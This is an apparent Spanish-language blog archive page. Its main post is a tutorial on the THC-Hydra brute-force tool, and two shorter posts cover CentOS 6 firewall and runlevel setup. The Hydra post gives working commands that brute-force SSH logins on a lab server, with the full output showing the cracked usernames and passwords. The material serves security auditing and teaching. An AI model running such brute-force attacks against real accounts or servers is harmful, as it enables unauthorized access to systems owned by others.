Archivos para enero, 2012

THC-Hydra es un práctico Software con licencia GPLv3, que permite realizar auditoria por medio de fuerza bruta a las cuentas de  usuarios y contraseñas de los diferentes servicios que se estén  implementando en un sistema de información.

Existe otro tipo de software con funcionalidad parecida,  pero, de THC-Hydra podemos destacar las siguiente características:

  • Licencia que permite el uso y descarga con total libertad.
  • Soporte a gran cantidad de protocolos ( detalles en Currently this tool supports)
  • Flexible en cuanto al uso, y rápido al auditar los sistemas de información.
  • Multiplataforma (Windows, Linux, Solaris, FreeBSD, etc)

Actualmente se está implementando de forma estable la versión 7.1. En BackTrack 5 R1, se encuentra la versión 6.5 instalada y funcional.

Currently this tool supports:
	  AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST,
	  HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
	  HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle,
	  PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum,
	  SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Tomado de http://www.thc.org/thc-hydra/
 

Opciones para uso de la versión 6.5 implementada en BackTrack 5 R1

Options:
  -R        restore a previous aborted/crashed session
  -S        connect via SSL
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
   -p PASS  or -P FILE try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -e ns     additional checks, "n" for null password, "s" try login as pass
   -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   server list for parallel attacks, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
   -f        exit after the first found login/password pair (per host if -M)
  -t TASKS  run TASKS number of connects in parallel (default: 16)
  -W TIME   defines the wait time between connects for one thread in seconds
   -w TIME   defines the max wait time in seconds for responses (default: 20)
  -4 / -6   prefer IPv4 (default) or IPv6 addresses
  -v / -V   verbose mode / show login+pass combination for each attempt
  -U        service module usage details
Tomado de las ayudas del software que se imprimen por el terminal

THC-Hydra en la Práctica.

Ejemplo 1.

Práctica realizada desde una  distribución BackTrack 5 R1 y con la versión 6.5 de THC-Hydra.

En el siguiente ejemplo atacaremos por fuerza bruta y éticamente con THC-Hydra al servicio SSH instalado en un servidor con IP 172.16.66.219 instalado para estos fines.

En el terminal se escribe el siguiente código:

# hydra -l david -P acronym  172.16.66.219 ssh -s 22 -w 99999999

Donde:

-l hace referencia al nombre de la cuenta del usuario que utiliza el servicio SSH, en el ejemplo es: david.

-P Hace referencia al archivo (diccionario) donde estará el listado de las posibles contraseñas a adivinar, en el ejemplo es: acronym.

ssh Se refiere al servicio que será auditado y se encuentra activo.

-s Hace referencia al puerto del servicio a auditar, en el ejemplo es el 22 correspondiente al servicio SSH.

-w Esta propiedad es muy importante, y hace referencia al tiempo que tomará la auditoría.

 
 Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
 Hydra (http://www.thc.org/thc-hydra) starting at 2012-01-22 12:45:56
 WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 se..
 [DATA] 16 tasks, 1 servers, 19195 login tries (l:1/p:19195), ~1199 tries per task
 [DATA] attacking service ssh on port 22
 [STATUS] 152.00 tries/min, 152 tries in 00:01h, 19043 todo in 02:06h
 [22][ssh] host: 172.16.66.219   login: david   password: ADDICT-L
 [STATUS] attack finished for 172.16.66.219 (waiting for children to finish)
 Hydra (http://www.thc.org/thc-hydra) finished at 2012-01-22 12:48:53

Finalmente el THC-Hydra arroja los resultados, se puede constatar que la contraseña ha sido adivinada, ya que se encontraba dentro del diccionario utilizado como prueba.

Ejemplo 2.

En este ejemplo buscamos a todos los de usuarios que tienen como contraseña 123456 en el  servidor SSH y además se encuentre dentro del diccionario llamado dic.

#hydra -L dic -p 123456 172.16.66.219 ssh -s 22 -w 99999

Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2012-01-22 21:53:18
 WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 se..
[DATA] 16 tasks, 1 servers, 133 login tries (l:133/p:1), ~8 tries per task
[DATA] attacking service ssh on port 22
 [22][ssh] host: 172.16.66.219   login: laura   password: 123456
[STATUS] 74.00 tries/min, 74 tries in 00:01h, 59 todo in 00:01h
[STATUS] 46.00 tries/min, 92 tries in 00:02h, 41 todo in 00:01h
[22][ssh] host: 172.16.66.219   login: carlos   password: 123456
 [STATUS] attack finished for 172.16.66.219 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2012-01-22 21:56:27

Vemos los únicos 2 nombres de usuarios que cumplen con la contraseña 123456.

Hasta una próxima.

by Mauroxan

Desde una PC local es posible interpretar nuestros códigos PHP y aplicaciones Web  siempre y cuando se trabaje con un Servidor Apache, lenguaje de programación PHP  y Base de Datos MySQL u otra.

¿Acaso has querido cargar tus aplicaciones web desde otra PC perteneciente a  tu red local? Si has querido y  has podido, te felicito. Si lo has querido y no has podido entonces fíjate en lo siguiente.

Algunos sistemas GNU/Linux implementan Firewall que evitan las entrada desde otros ordenadores, programas y usuarios, por medio de los puertos asignados a cada servicio. Esto ocurre en  Centos 6, siendo necesario entonces que se active el puerto 80 para poder comunicar la red local y externa al Servidor Web, y de esta forma poder llamar al Servidor Web desde otra PC  y ver en nuestro navegador la aplicación Web interpretada.

Se debe tener instaladas y configuradas  las siguientes aplicaciones:

Apache

PHP

MySQL

Para esto sigue los siguientes pasos.

  1. Nos dirigimos al menú de System
  2. Escogemos la opción del menú desplegado Administration
  3. Y por último en el nuevo menú cargado presionamos Clic a Firewall
  4. Ingresamos la contraseña de root para poder configurar el Firewall
  5. Coloca el chulo al puerto: WWW(HTTP)   80tcp
  6. En la parte superior de la misma ventana presiona el botón Apply para aplicar los cambios.
  7. Por último se aconseja reiniciar el servidor Apache por terminal y con permisos de administración tecleando el siguiente comando:
  8. # service httpd restart
  9. Ya podremos abrir nuestras aplicaciones Web desde otra PC y con ayuda de un Navegador Web, escribiendo en la URL del navegador la ruta a la IP donde se encuentra instalado el Server Apache.

Supongamos que:

  1. el servidor apache se encuentra instalado en la PC con  IP 192.168.1.2
  2. el usuario se encuentra en la Pc con IP 192.168.1.3

Para poder acceder al Servidor Apache desde el PC 192.168.1.3, bastaría con solo abrir un navegador Web y escribir en la URL:

http://192.168.1.2

Los Sistemas Operativos consumen parte de la memoria al ejecutar los sistemas de ventanas, conocidos como Sistemas X. Para aprovechar toda las virtudes de Centos 6 como servidor, se aconseja iniciar el Sistema Operativo sin entorno gráfico.

Para realizar esta tarea, tan solo bastaría con la modificación de una linea de código por terminal.

Estando con privilegios de administración escribimos el siguiente comando, para editar el archivo inittab:

# nano /etc/inittab

Presionamos Enter

Al final del archivo se encuentra la siguiente línea:

id:5:initdefault:

Se edita esta línea remplazando el número 5 por el 3, quedando de la siguiente forma:

id:3:initdefault:

Ahora se reinicia el Sistema Operativo Centos 6, para que se ejecute en modo comando desde su inicio.